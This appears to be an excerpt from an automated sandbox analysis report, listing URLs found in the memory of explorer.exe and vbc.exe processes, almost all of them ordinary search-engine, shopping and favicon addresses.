Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: http://instagram.com/casarpontocom
Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000009.00000000.2161562073.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000009.00000000.2161562073.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000009.00000002.2350071899.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2152979155.0000000002331000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000009.00000000.2163853579.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000009.00000000.2161562073.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: vbc.exe, vbc.exe, 00000005.00000000.2146119933.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp, explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/PayrollManagerDBDataSet.xsd
Source: explorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000009.00000000.2161562073.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000009.00000000.2172829427.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000009.00000002.2350071899.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2161562073.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
